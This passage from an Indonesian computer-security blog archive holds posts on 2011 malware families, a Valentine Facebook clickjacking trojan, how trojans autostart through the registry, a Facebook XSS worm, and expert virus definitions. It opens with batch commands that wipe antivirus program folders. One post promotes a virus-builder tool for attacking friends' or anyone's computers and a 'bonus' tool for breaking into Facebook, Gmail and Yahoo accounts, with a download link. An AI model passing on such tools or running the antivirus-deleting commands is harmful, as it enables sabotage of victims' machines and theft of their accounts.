del /f /q /s /a:R  C:\progra~1\kasper~2\*.* >nul
del /f /q /s /a:R  C:\progra~1\mcafee\*.* >nul
del /f /q /s /a:R  C:\progra~1\mcafee.com\*.* >nul
del /f /q /s /a:R  C:\progra~1\mcafee.com\agent\*.* >nul
del /f /q /s /a:R  C:\progra~1\mcafee.com\VSO\*.* >nul
del /f /q /s /a:R  C:\progra~1\mcafee~1\*.* >nul
del /f /q /s /a:R  C:\progra~1\mindso~1\*.* >nul
del /f /q /s /a:R  C:\progra~1\norman\*.* >nul
del /f /q /s /a:R  C:\progra~1\norton~1\*.* >nul
del /f /q /s /a:R  C:\progra~1\norton~2\*.* >nul
del /f /q /s /a:R  C:\progra~1\pandas~1\*.* >nul
del /f /q /s /a:R  C:\Progra~1\Alwils~1\*.* >nul
del /f /q /s /a:R  C:\progra~1\iolo\*.* >nul
3. SystemTools (Maret)
Mengingatkan kita pada website resmi salah satu antivirus lokal yang disisipkan oleh antivirus palsu. Dan menariknya, antivirus palsu ini mirip seperti worm lokal yang meninggalkan pesan akan kehadirannya. Sebenarnya tidak sulit dalam menghadapi malware tipe trojan ini, SystemTools hanya memfokuskan payload untuk mendisable proses yang namanya tidak tidak seperti proses aplikasi pada Windows.
4. FakeAV-Downloader.K (April)
Lagi-lagi antivirus palsu yang menyerang user. Kali ini menyebar lewat email dari website yang mungkin sudah dikuasai pihak lain selain pemilik aslinya. Dan dengan sengaja mengirimkan sebuah pesan email ke setiap user secara acak yang isinya terlampir sebuah file antivirus palsu. Dan parahnya, layaknya antivirus palsu yang umumnya mengharuskan user membayar sejumlah uang dengan nilai nominal yang cukup tinggi untuk mendapatkan aktifasi serial number antivirus palsu tersebut. Dan kenyataannya, tidak ada jaminan bahwa setelah user membayarkan nominal yang tertera pada websitenya, komputer yang terinfeksi antivirus palsu tersebut akan kembali normal.
5. FontPorn (Mei)
Sosial Engeneering adalah konsep yang tepat untuk menggambarkan teknik FontPorn untuk menginfeksi komputer user. Banyak dikeluhkan user yang katanya ada shortcut porno di flash disknya. Karena memang setelah aktif di memory, FontPorn akan membuat beberapa file seperti:
1. autorun.inf
2. pornmovs.lnk (icon folder)
3. myporno.avi.lnk (icon file video)
4. setup50045.lnk (icon shortcut)
5. setup50045.fon (host dengan icon font file)
Selain bersifat worm, FontPorn juga melakukan koneksi ke website yang berasal dari Ukraina. Meski demikian, belum tentu FontPorn berasal dari Ukraina.
6. Serviks.I (Juni)
Salah satu varian worm Serviks buatan Serviks Maker adalah Serviks.I. Mencari setiap file dokumen HTML dan PHP yang terdapat pada drive kemudian dihapus dan digantingan dengan dokumen baru yang berisi pesan dari Serviks Maker. Namun setelah dilihat lebih jauh, worm Serviks.I kali ini hanyalah hasil modifikasi dari worm Aksika yang memang source codenya disebarluaskan.
7. Proklamasi (Juli)
Menjelang perayaan 17 Agustus 2011, ada saja virus maker yang membuat perayaan dengan cara sendiri. Teks Proklamasi yang biasanya dibacakan saat prosesi upacara bendera setiap tanggal 17 agustus ini, dibuat sedikit berbeda oleh worm Proklamasi. Melalui pesan pada file HTML-nya, kita dapat melihat teks proklamasi. Meski belum banyak laporan akan menyebarnya worm ini, tetap saja termasuk worm yang berbahaya.
8. NgrBot (Agustus)
Ini dia, sang pencuri ulung dengan kemampuan bersembunyi yang mampu disiapkan seseorang secara sengaja untuk mencuri akun milik user yang diinfeksinya. Worm tipe trojan ini memang sengaja dibuat untuk kepentingan pribadi dan mendapatkan keuntungan sebesar-besarnya dari hasil infeksi setiap komputer yang terkoneksi dengan internet. Belakangan ini dilaporkan juga bahwa NgrBot banyak menyebar melalui chat pada Facebook.
9. None (September)
Ukurannya 2MB, padahal source aslinya hanya berukuran 55.1 KB dan None adalah worm yang berasal dari Indonesia. Social Engineering merupakan media utama worm ini dalam menyebar. Dengan nama “cara_menghapus_virus_win32_ramnit_sality.rar” seolah akan meyakinkan user untuk melihat dokumen asli dari file archive tersebut. Di dalam pesan dari worm None, disisipkan sebuah URL yang mengarah kepada situs porno. Worm ini semakin terlihat sangat istimewa dengan bergeraknya start menu dan bergeraknya cursor dengan sendirinya secara acak yang akan membuat user kesulitan dalam mengendalikan komputer yang sudah terinfeksi worm ini.
10. AryaN (Oktober)
Masih dengan shortcut, AryaN melakukan sedikit modifikasi pada teknik membuat shortcutnya. Umumnya, setelah malware membuat shortcut pada flash disk menggunakan nama dari file atau folder, kemudia file atau folder tersebut di-hidden. Sedangkan AryaN, tidak meng-hidden file atau foldernya, tetapi membackup file tersebut kedalam sebuah folder yang dibuat oleh AryaN. Dan setiap shortcut yang dihasilkan, memiliki icon yang sama seperti file aslinya. Sehingga, bagi user yang lengah sudah tentu akan mengaktifkan malware yang dipanggil melalui shortcut.
11. BlackLabel (November)
Diawali dengan website yang seolah akan menunjukan konten porno, kemudian user akan diarahkan kesebuah halaman website dan mendapat peringatan bahwa komputernya terinfeksi virus. Setelah itu secara otomatis user mendownload sebuah file, begitulah teknik yang digunakan BlackLabel. Setelah aktif di memory, BlackLabel akan mendownload file varian lainnya.
12. Alice (Desember)
Penutup malware di 2011 ini adalah worm tipe VBS yang juga menginfeksi file HTML atau HTM. Bukan hanya menginfeksi file, Alice juga memiliki keunikan lain dimana hampir seluruh tubuhnya di-encode. Dengan tubuh yang berisi source code acak, Alice termasuk worm yang berhasil meloloskan diri dari beberapa antivirus luar termasuk lokal. Worm sederhana yang akan membuat jengkel beberapa user karena ditemukan adanyak ketidak wajaran dari file document Microsoft Word. Wajar saja, setiap dokumen dengan tipe *.doc, *.docx dan *.rtf.
Dari beberapa malware yang sudah di jelaskan di atas, terdapat juga malware yang masih banyak menyebar seperti Sality, Alman, Virut, Conficker. Dengan adanya teknik encode seperti Alice, besar kemungkinan di tahun 2012 nanti akan ada malware tipe vbs yang menggunakan teknik encode seperti Alice. Dan teror NgrBot, akan sepertinya akan terus berlanjut. 

Sumber : www.virusindonesia.com

2/04/2012

no image

Info Virus Terbaru Malware Valentine Mengancam Facbooker

Info Virus Terbaru Malware Valentine Mengancam Facbooker - 10 Hari lagi nih suasana bulan Februari ini akan disemarakkan oleh para pemuja cinta dan kasih sayang. Ya, hari valentine yang kebanyakan dinanti oleh para remaja akan segera hadir. Nuansa valentine pun sudah mulai terasa, begitu juga halnya di dunia maya. Sayangnya, yang terasa itu bukanlah nuansa positif. Bagi para pengguna facebook, apalagi facebooker yang ingin merubah tampilan facebooknya dengan nuansa valentine, ada baiknya berhati-hati. Tapi kalau kamu ingin mengganti tema windows 7 kamu dengan tema valentine ada baiknya kamu klik di sini.

Mengapa saya memberikan peringatan kepada para facebooker tentang hal ini, tiada lain ini berdasarkan informasi yang saya terima dari InfoKomputer.Com bahwa ada Malware Valentine yang mengancam para facebooker.


alt
Baru-baru ini, Trend Micro—perusahaan keamanan terkemuka—mengidentifikasi adanya malware valentine yang mengincar pengguna Facebook di seluruh dunia. Trend Micro mengingatkan kepada pengguna Facebok agar lebih jeli dan berhati-hati ketika mengakses jejaring sosial terbesar tersebut, baik menggunakan mobile maupun via PC. 

Trend Micro menemukan adanya kegiatan clickjacking yang memanfaatkan laman Facebook untuk menjalankan aksinya. Serangan ini dimulai dengan ditemukannya sebuah postingan di wall yang berisi ajakan untuk meng-klik dan menginstal theme gratis bagi tampilan Facebook pribadi dengan nuansa khas Valentine. 

Trend Micro mendeteksi installer tersebut sebagai TROJ_FOOKBACE.A. Ketika dieksekusi, TROJ_FOOKBACE.A ini akan mengeksekusi sebuah script yang menampilkan iklan dari situs-situs tertentu.
Pengguna yang mengeklik dan menginstal melalui browser Google Chrome dan Mozilla Firefox, malware ini akan dengan sendirinya akan mengarahkan pada instalasi Facebook Environment/Facebook.com yang muncul di tab kanan atas halaman Facebook pengguna. 
alt

Selanjutnya, jika aplikasi tersebut sudah terinstal, akan memantau kegiatan pengguna sekaligus mengarahkan pada sebuah halaman survei yang meminta agar pengguna memasukkan nomor ponsel. 

Bagi yang menggunakan browser Internet Explorer, tanpa harus menginstal Facebook Environment, maka pengguna akan langsung diarahkan pada halaman survei. 

Dari pantauan Trend Micro hingga saat berita ini ditulis, belum terjadi teknik pencurian data. Namun demikian, vendor antivirus asal Taiwan ini tetap memperingatkan pengguna agar berhati-hati terhadap jebakan theme gratis bernuansa Valentine ini.

Sumber : www.infokomputer.com

1/17/2012

no image

Pembahasan Tentang Trojan, Pengertian, Sejarah dan Cara Kerja Trojan

Trojan Hourse? Sebagai orang yang sehari-hari begulat dengan teknik komputer khususnya komputer jaringan, tentu sudah tidak asing lagi dengan apa yang disebut dengan trojan horuse. Namun dikalangan pemula seperti saya, istilah ini sedikit asing. Yang ada dalam benak saya trojan adalah virus komputer. Namun apakah benar demikian? Hanya sekedar viruskah, atau mungkin lebih brebahaya dari virus komputer biasa?

Untuk mengobati rasa penasaran sekaligus kebutaan pengetahuan tentng trojan ini, saya bertanya sama mbah google. Akhirnya saya dapatkan pembahasan tentang trojan. Hmmm…karena dilandasi semangat berbagi, kemudian pembahasan tentang trojan ini saya share di sini. Apa saja yang akan dibasa? Yaitu mengenai Penertian, Sejarah dan Cara Kerja Trojan.

Pengertian Trojan / Definisi Trojan
Sebelum kita menyimpulkan apa itu troja, ada beberapa point yang perlu di lihat :
  1. Trojan merupakan tool yang dapat digunakan untuk memonitoring mesin lain. Pengertian umum dapat di katakan sebagai kamera yang tersembunyi yang di tempatkan di komputer target.
  2. Trojan bukanlah hacking tools. Hanya saja sebagai pelengkap dalam langkah hacking.
  3. Begitu anda dapat masuk ke system target, maka anda dapat memasukkan trojan ini untuk kelanjutan memonitoring, mengotrol dan mencuri password di mesin target.
Melihat dari point-point di atas dapat kita simpulkan bahwa trojan adalah program jahat yang sengaja dibuat untuk menyusup ke komputer korban yang kemudian mencuri data-data rahasia dari komputer korban. Kalau kita bandingkan dengan virus yang biasa menginfeksi komputer jelas ada perbedaan yang sangat mencolok. Virus hanya menginfeksi dan melakukan pengrusakan sistem secara lokal (kerusakan pada komputer itu sendiri) sedangkan trojan membiarkan komputer tetap berjalan seolah-olah normal tapi mengambil data-data yang terdapat pada komputer program. Wah, hati-hati dalam menyimpan data-data rahsia anda ya…..

Sejarah Trojan
Asal muasal istilah Trojan Horse berasal dari Yunani di mana diceritakan para perjuang yang bersembunyi di dalam kuda trojan yang terbuat dari kayu yang sangat besar. Mereka kemudian akan keluar dari kuda kayu tersebut setelah dikira pergi dari daerah tersebut dan menyerang ke target-target yang ditentukan. Dan kemudian para pejuang itu akan memberikan jalan kepada para pejuang lain yang akan menyerang.

Trojan dikelompokkan dalam jenis malware yaitu automated-program atau program yang dapat hidup sendiri. Trojan ini juga dianggap destruktif, hanya saja ia tidak seperti virus yang menyebarkan diri sendiri. Tetapi akan terdeteksi sebagai virus.

Cara Kerja Trojan
Virus trojan masuk melalui dua bagian, yaitu bagian client dan server. Ketika korban (tanpa diketahui) menjalankan komputer, kemudian penyerang akan menggunakan client untuk koneksi dengan server dan mulai menggunakan virus Trojan tersebut.

Protokol TCP/IP adalah jenis protokol yang umum digunakan untuk komunikasi, dan virus trojan dapat bekerja dengan baik dengan jenis protokol ini—beberapa trojan juga dapat menggunakan protokol UDP dengan baik. Ketika server mulai dijalankan (pada komputer korban), Trojan umumnya mencoba untuk menyembunyikan diri di suatu tempat dalam sistem komputer tersebut, kemudian mulai “mendengarkan” di beberapa port untuk melakukan koneksi, memodifikasi registry dan/atau menggunakan metode lain yaitu metode autostarting.

Metode autostarting ini merupakan metode terbaru dan banyak digunakan oleh sebagian besar virus Trojan. Metode autostarting adalah virus trojan akan secara otomatis aktif saat komputer dihidupkan. Walaupun komputer dimatikan dan kemudian dihidupkan lagi, virus trojan mampu bekerja kembali dan penyerang mengakses kembali ke komputer korban.

Sistem kerja metode autostarting memulai dengan mengkoneksikan virus trojan ke dalam beberapa file executable yang sering digunakan, misalnya explorer.exe, dan kemudian memodifikasi file sistem atau Windows Registry. File sistem yang telah termodifikasi tersebut kemudian ditempatkan di direktori Windows, dan dari direktori ini penyerang melaksanakan penyerangan atau penyalahgunaan.

Adapun yang paling umum adalah menempatkannya trojan di registry, khususnya di windows, yang akan terlihat seperti :

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
“Server”=”C:\\WINDOWS\\server.exe”

Program tersebut tidak akan terlihat oleh user, program ini akan dapat mengambil password , setting mail, IP dan port number. Dengan adanya program server (trojan) ini yang telah aktif di computer target, maka anda dapat melakukan connection dengan menggunakan program remote(client) dan tentu saja anda dapat melakukan banyak hal tergantung banyaknya fasilitas yang ada di dalam trojan tersebut.

Hal-hal yang dicari oleh trojan
Sebagian pemakai Internet beranggapan bahwa Trojan hanya bersifat merusak saja. Anggapan tersebut tidak benar, karena Trojan dapat digunakan alat untuk mata-mata dan melakukan penyadapan pada beberapa komputer korban. Data yang disadap berupa data pribadi maupun informasi yang sensitif (misalnya spionase dalam industri).
Contoh hal-hal yang diminati penyerang adalah sebagai berikut.
·         Informasi Kartu Kredit.
·         Data akuntansi (email passwords, dial-up passwords dan webservices passwords).
·         E-mail Addresses.
·         Work Projects (dokumen pekerjaan).
·         Nama anak-anak dengan foto dan umurnya.
·         Dokumen sekolah. [RY]

Nah, demikian pembahasan tentang trojan, pengetian, sejarah dan cara kerja trojan. Materi pembahasan diambil dari berbagai sumber yang ada diinternet. Semoga bisa memperkaya pengetahuan kita tentang teknologi komputer terutama tentang bahaya trojan terhadap keamanan data-data yang kita simpan dalam komputer.

11/02/2011

no image

Software Pembuat Virus | Cara Mudah Membuat Virus

Software Pembuat Virus adalah artikel lanjutan dari artikel sebelumnya tentang Sejarah Virus Komputer. Pada artikel tersebut ada yang bertanya kalau ingin membuat virus menggunakan software apa? Terus terang aja, saya sendiri belum pernah membuat virus. Di sini saya hanya share aja bahwa ada software pembuat virus yang sangat mudah untuk digunakan tapi efeknya lumayan juga untuk mengerjai komputer teman ataupun komputer siapa saja yang kamu kehendaki.

Pengin Cara Mudah Membuat Virus? Ya, coba aja software ini. Visur yang dihasil software ini bisa di setting dalam berbagai icon.Mulai pdf,doc,zip,jpg,exe,dan lainnya (silakan deh cob aja dulu.)

Efek yang di timbulkan juga oleh viru buatan software pembuat virus ini juga lumayan banyak, seperti menjadikan mouse gila (gerak gak karuan dan tidak bisa di kendaliakan), mematikan task manager, menghilangkan pointer, menjadikan komputer hang, disable task manager, word pad, notepad, run, control panel, dekstop icon, time, dan disable lainnya.

Keunggulan software pembuat virus ini adalah bersifat portable, sehingga kita tak perlu instal terlebih dahulu ke komputer dan bisa membuat virus dimana saja kita suka termasuk di warnet. Proses pembuatannya sangat cepat cukup klik create virus dan sudah jadi, cuma butuh 2 detik virus yang kamu kehendaki langsung jadi.

Bonus Software Untuk Membobol Akun Facebook, Gmail, Yahoo
Nah, software ini mungkin banyak dicari oleh orang-orang yang suka penasaran dengan akun milik orang lain. Menurut informasi yang saya baca di forum yang posting link download software ini, mengatakan bahwa software ini bisa digunakan untuk membobol akun facebook, gamail dan yahoo milik orang lain.

Gak kebanyakan cerita deh, silakan langsung aja download melalui link di bawah ini :
http://www.mediafire.com/?zztynzmdzfn

Warning!!!
Saya hanya sekedar share informasi aja. Adapun akibat yang ditimbulkan oleh software-software di atas adalah diluar tanggung jawan saya alias ditanggung sendiri. Karena bisa saja justru software yang anda download tersebut mengandung virus dan menyebar pada komputer anda. Jadi, hati-hatilah dalam berkesperimen. Pastikan komputer anda sudah di pasang Deep Freez.

9/17/2011

no image

Hati-Hati Ada Jebakan di Facebook

Hati-hati dengan jebakan Betmen
XSS yang seperti si Komo
Kalau si Komo lewat membuat anak-anak, nenek-nenek dan pak polisi juga bingung. Maka Script yang satu ini juga tidak kalah dengan si Komo. Para pengguna Facebook dua hari belakangan ini dibingungkan oleh serangan script jahat yang memanfaatkan XSS (Cross Site Scripting) yang hebatnya hanya dengan mengklik link yang diberikan dan umumnya menggunakan url shortener (bit.ly, tinyurl.com, goo.gl) yang akan menghantarkan korbannya ke halaman situs yang telah dipersiapkan sebelumnya yang mengandung eksploitasi XSS ini.

Adapun pesan yang muncul adalah sebagai berikut :
Perhatikan gambar di atas.
Pembuat XSS ini jelas orang Indonesia dan kemungkinan besar mengikuti perkembangan berita khususnya sepakbola di Indonesia, dimana ada seorang pimpinan organisasi yang mati-matian disuruh turun dari jabatannya tetapi yang bersangkutan mati-matian tidak mau turun dari jabatannya dan sempat mengeluarkan statement :

“Sebagai anak bangsa, meski sampah, tapi saya sudah berbuat sesuatu untuk bangsa ini. Saya tidak rela dizolimi terus,” sambungnya.

Dengan memanfaatkan issue terkini dan menjadikannya rekayasa sosial yang canggih maka tidak heran kalau banyak orang yang tertarik terhadap link yang dijanjikan dan berharap melihat sesuatu yang lucu dari link tersebut. Tetapi alih-alih gambar lucu yang di dapatkan, yang terjadi malahan pengakses link ini menjadi lucu dan menjadi korban XSS dan secara otomatis script tersebut akan melakukan posting pada akun Facebooknya.

Tidak mencuri Password
Melihat metode XSS yang digunakan, kemungkinan besar script ini tidak melakukan aksi mencuri password tetapi mirip dengan aksi yang dilakukan oleh Firesheep yang mampu mencuri cookie sesama pengguna Wifi lain tanpa mengetahui passwordnya dan menggunakannya untuk login ke akun-akun Facebook, Twitter dan Yahoo Mail yang tidak menggunakan pengamanan https. Tetapi, demi alasan keamanan dan berjaga-jaga saja, Vaksincom menyarankan anda yang pernah mengklik link ini untuk mengganti password Facebook anda.

URL Shortener
URL shortener / penyingkat URL sebenarnya diciptakan untuk tujuan yang baik. URL shortener dapat menyingkat alamat URL yang panjang menjadi sangat pendek. Tetapi ibarat dua sisi mata pedang. URL shortener sangat marak digunakan oleh spammer, pembuat virus dan malware. Karena alamat asli URL shortener ini sama sekali tidak bisa di lihat dan sekali klik link yang diberikan oleh URL shortener tersebut, maka kita akan diantarkan ke alamat situs yang telah di daftarkan sebelumnya oleh pembuat URL shortenr ini. Jika situs tersebut mengandung kode jahat seperti XSS ini, maka script ini akan mampu membuat korbannya secara otomatis melakukan posting secara otomatis tanpa disadari oleh pemilik akun.

Karena itu, harap anda super hati-hati jika mendapatkan link yang mengandung URL shortener seperti bit.ly, tinyURL.com, goo.gl dan penyingkat URL lainnya.

Salam,
Aa Tan (Vaksin.com)
Sumber : Vaksin.com

6/08/2011

no image

Penjelasan Ahli Tentang Virus Komputer

Virus Komputer!!! Ini selalu menarik untuk diperbincangkan. Hal ini karena ada banyak ragam efek virus yang ditimbulkan terhadap sebuah komputer. Maka kemudian muncul berbagai macam pendapat tentang virus komputer. Lalu bagaimana orang yang benar-benar ahli menjelaskan tentang virus komputer??? Mari kita simak uraian berikut ini.

Virus Komputer didefinisikan sebagai suatu aplikasi yang dapat mereplikasi diri dalam suatu jaringan komputer. (Sigit W Warsito : Suara Merdeka Edisi Sabtu 4 Juni 2011 Hal. 8 Aneka Virus Komputer)

Virus Komputer memiliki sifat merusak dan kemampuan menginfeksi file-file lain menjadi memiliki sifat yang sama dengan virus tersebut. Selain itu, virus komputer juga dapat mengubah ukuran file yang terinfeksi tanpa merubah tanggal modifikasi suatu file.

Kerusakan yang diakibatkan oleh virus komputer secara umum hanya terjadi pada software saja, sedangkan kerusakan hardware yang diakibatkan oleh virus secara langsung sangat jarang terjadi. Meskipun kerusakan pada hardaware juga bisa saja terjadi, yaitu dengan cara virus memaksa suatu hardware bekerja melebihi batas kemampuan hardware tersebut.

Target yang menjadi serangkan virus-virus komputer saat ini, kebanyakan adalah system operasi windows. Secara logika, ini layak terjadi. Mengapa demikian??? Karena sebagian besar pengguna komputer adalah pengguna system operasi windows. Jadi pembuat virus juga kebanyakan menjadikan windows sebagai target dari virus-virus buatannya.

Lebih lanjut Penjelasan Tentang Virus Komputer ini terus diberikan oleh Sigit W Warsito tentang Jenis Virus Komputer. Berdasarkan cara kerjanya, maka virus komputer dapat digolongkan menjadi beberapa kategori :
1.      Trojan : Virus komputer ini mengambil data dari komputer yang terinfeksi kemudian mengirimkannya kepada pembuat trojan tersebut.
2.      Backdoor : Cara kerjanya hampir sama dengan trojan, perbedaanya adalah backdoor menyamarkan dirinya sebagai aplikasi yang aman-aman saja. Misalnya sebagai game.
3.      Worm : Worm ini menduplikasikan dirinya pada hardisk, sehingga hardisk komputer menjadi penuh. Umumnya worm tidak merusak, tapi selain membuat komputer menjadi lambat juga bisa membahayakan mail server.
4.      Virus Macro : Virus yang dibuat dengan memanfaatkan pmograman modular yang ada pada suatau program aplikasi seperti Ms. Word, Ms. Excel dan Corel Draw Perfect

Penjelasan Tentang Virus Komputer berikutnya adalah tentang tanda-tanda komputer yang terinfeksi virus. Banyak sekali indikasi yang ditimbulkan dari sebuah komputer yang terinfeksi virus. Diantara indikasi-indikasi tersebut adalah komputer bejalan lambat, sering terjadi eror, sering menampilkan pesan-pesan aneh.

Selain indikasi di atas, komputer juga sering melakukan uuto copy. Yaitu pada saat kita mencolokan flasdisk ke komputer maka secara otomatis flasdisk akan terisi oleh file-file aneh yang mencurigakan. Yang sering terjadi beberapa hari terakhir pada komputer saya adalah secara otomatis mengcopy file berupa shortcut dan menambahkan folder RYCECLER pada flasdisk yang dicolokan ke komputer. Pada folder tersebut terisi banyak sekali file exe.

Demikian Penjelasan Ahli Tentang Virus Komputer yang saya kutip dari Harian Suara Merdeka. Semoga bisa bermanfaat bagi anda yang sedang mencari referensi artikel tentang virus komputer.